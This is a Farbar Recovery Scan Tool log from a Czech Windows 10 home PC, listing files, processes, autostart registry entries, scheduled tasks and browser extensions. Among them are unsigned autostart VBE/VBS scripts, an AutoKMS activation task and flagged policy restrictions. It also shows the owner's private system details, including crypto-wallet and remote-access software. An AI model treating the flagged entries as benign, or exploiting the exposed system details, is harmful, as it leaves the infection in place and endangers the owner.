2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 18:41 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 18:40 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 18:17 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 18:17 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 18:17 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 18:17 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 18:13 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 18:13 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 18:13 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 18:13 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 18:04 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp
==================== Files in the root of some directories ========
2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 18:40:54)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]
FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
